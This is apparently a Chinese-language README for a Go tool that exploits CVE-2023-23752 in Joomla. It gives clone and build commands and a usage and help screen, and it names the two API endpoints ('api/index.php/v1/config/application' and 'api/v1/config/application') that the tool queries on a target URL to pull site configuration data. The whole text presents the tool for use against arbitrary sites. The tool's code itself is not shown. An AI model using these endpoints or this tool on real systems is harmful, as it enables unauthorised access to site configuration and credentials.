CVE-2023-23752 数据提取器
git clone https://github.com/JohnDoeAnonITA/CVE-2023-23752
cd CVE-2023-23752
go build .
CVE-2023-23752[.exe] [-h|--help] -u|--url "<值>" [-t|--type (1|2)]
_ _ _
/_ /_ _ / | _ _ /_/_ _ _
(_//_// // //_.'/_//_'/ // //_// /
CVE-2023-23752 数据提取器 v0.1
参数:
-h --help 打印帮助信息
-u --url 要检索数据的网址。例如 http://examble.com 或
http://examble.com/joomla-path
-t --type 选择 1 表示 api/index.php/v1/config/application,或 2 表示
api/v1/config/application。默认为 1
